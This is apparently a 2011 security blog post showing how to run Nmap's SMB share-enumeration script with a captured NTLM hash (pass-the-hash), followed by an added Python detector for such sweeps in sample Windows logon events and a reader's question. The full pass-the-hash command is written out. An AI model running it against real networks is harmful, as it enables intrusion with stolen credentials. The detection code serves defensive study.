Friday, October 7, 2011

NMap & Pass-the-Hash

Let's speed up pwning the Enterprise another notch. In this scenario, we've obtained an account hash through a Man-in-the-Middle attack using, say, Easy-Creds. In my prior blog posts I showed how to automate a psexec attack across an entire IP range or list. But if the credentials aren't valid on all the targets, it can take time to go through the entire range/list, waiting for the authentication to fail, the module to time out, and the 2-second sleep. There has to be a better way, and there is.

Nmap supports the use of password hashes:

nmap -n -sT -p445 --script=smb-enum-shares.nse --script-args=smbuser=USER,smbhash=e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c,smbtype=v1,smbdomain=DOMAIN -oN SMB-User.txt --open -vv

HINT: To test using the local user password hashes, use "smbdomain=."

For further information:
(Look at smbtype)
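From the defender's side, a hash sweep like the one above leaves a distinctive trail: one source address performing NTLM network logons with a single account against many hosts in quick succession, and since the hash is rarely valid everywhere, failed logons on the hosts where it is not. The following Python is an added example (not from the original post) that flags that pattern in constructed, simplified Windows Security event records; the field layout and the thresholds are assumptions.

```python
"""Spot one source sweeping SMB/NTLM logons with a single account across many hosts."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of centralized Windows Security events (4624 = success,
# 4625 = failure), reduced to the fields a SIEM would normally extract.
# Layout: (timestamp, reporting host, event id, account, auth package, logon type, source ip)
SAMPLE_EVENTS = [
    ("2011-10-07T10:00:01", "FS01",  4625, "DOMAIN\\svc_backup", "NTLM", 3, "10.0.5.23"),
    ("2011-10-07T10:00:03", "FS02",  4625, "DOMAIN\\svc_backup", "NTLM", 3, "10.0.5.23"),
    ("2011-10-07T10:00:04", "WEB01", 4624, "DOMAIN\\svc_backup", "NTLM", 3, "10.0.5.23"),
    ("2011-10-07T10:00:06", "SQL01", 4625, "DOMAIN\\svc_backup", "NTLM", 3, "10.0.5.23"),
    ("2011-10-07T10:00:08", "DC01",  4624, "DOMAIN\\svc_backup", "NTLM", 3, "10.0.5.23"),
    # Normal traffic: one user hitting one file server over Kerberos in the same window.
    ("2011-10-07T10:00:02", "FS01",  4624, "DOMAIN\\alice", "Kerberos", 3, "10.0.7.11"),
    ("2011-10-07T10:00:09", "FS01",  4624, "DOMAIN\\alice", "Kerberos", 3, "10.0.7.11"),
]

def find_ntlm_sweeps(events, window=timedelta(minutes=5), min_hosts=3):
    """Return {(source_ip, account): sorted hosts} for each source that used one
    account over NTLM network logons (type 3) against >= min_hosts distinct hosts
    inside any `window`. Failures count as well: a hash valid on only some targets
    still produces a 4625 on each of the others, which is the sweep's footprint."""
    by_actor = defaultdict(list)
    for ts, host, event_id, account, package, logon_type, src in events:
        if event_id in (4624, 4625) and package == "NTLM" and logon_type == 3:
            by_actor[(src, account)].append((datetime.fromisoformat(ts), host))
    hits = {}
    for actor, seen in by_actor.items():
        seen.sort()
        best, start = set(), 0
        # Sliding window over this source/account's time-ordered logons; keep the
        # largest set of distinct hosts reached within any single window.
        for end in range(len(seen)):
            while seen[end][0] - seen[start][0] > window:
                start += 1
            hosts = {h for _, h in seen[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            hits[actor] = sorted(best)
    return hits

if __name__ == "__main__":
    for (src, account), hosts in find_ntlm_sweeps(SAMPLE_EVENTS).items():
        print(f"{src} used {account} over NTLM against {len(hosts)} hosts: {', '.join(hosts)}")
```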


  1. I realize this is a very naive question, but how do you specify a password that contains spaces? nmap --script=smb-enum-shares --script-args="smbuser=user,smbpass="This is a sentence" <<<< Does not work...
